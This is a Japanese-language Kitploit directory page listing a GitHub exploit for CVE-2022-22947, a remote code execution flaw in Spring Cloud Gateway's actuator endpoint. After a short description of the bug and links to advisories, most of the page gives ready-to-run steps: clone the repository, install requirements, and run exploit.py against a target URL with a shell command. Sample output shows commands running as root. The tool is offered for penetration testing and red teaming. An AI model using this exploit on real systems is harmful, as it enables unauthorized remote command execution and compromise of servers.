Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2022-22947 — Spring Cloud Gateway < 3.0.7 & < 3.1.1 コードインジェクション (RCE) | Kitploit
ツール/GitHubGitHub/crowsec-edtech/cve-2022-22947
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールレッドチーミング
GitHubcrowsec-edtech/cve-2022-22947

CVE-2022-22947

Spring Cloud Gateway < 3.0.7 & < 3.1.1 コードインジェクション (RCE)

リポジトリを見る
38144年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Spring Cloud Gateway < 3.0.7 および < 3.1.1 コードインジェクション (RCE)

CVE: CVE-2022-22947
CVSS: 10.0 (VMware - https://tanzu.vmware.com/security/cve-2022-22947)
Spring Cloud Gateway を使用するアプリケーションは、Gateway Actuator エンドポイントが有効かつ公開され、安全でない場合、コードインジェクション攻撃に対して脆弱です。リモートの攻撃者は、悪意を持って細工されたリクエストを送信することで、リモートホスト上で任意のリモート実行を可能にする可能性があります。

使用方法

root@kitploit:~
git clone https://github.com/carlosevieira/CVE-2022-22947
cd CVE-2022-22947
pip3 install -r requirements.txt
python3 exploit.py http://target 'id'
root@kitploit:~
john@doe:~/exploit/CVE-2022-22947/$ python3 exploit.py http://localhost:8080 'id'

    ###################################################
    #                                                 #
    #   Exploit for CVE-2022-22947                    #
    #   - Carlos Vieira (Crowsec)                     #
    #                                                 #
    #   Usage:                                        #
    #   python3 exploit.py <url> <command>            #
    #                                                 #
    #   Example:                                      #
    #   python3 exploit.py http://localhost:8080 'id' #
    #                                                 #
    ###################################################
    
[+] Stage deployed to /actuator/gateway/routes/rtxhovup
[+] Executing command...
[+] getting result...
[+] Stage removed!
uid=0(root) gid=0(root) groups=0(root)

参考文献

https://wya.pl/2022/02/26/cve-2022-22947-spel-casting-and-evil-beans/

https://spring.io/blog/2022/03/01/spring-cloud-gateway-cve-reports-published

https://tanzu.vmware.com/security/cve-2022-22947

ツールをダウンロード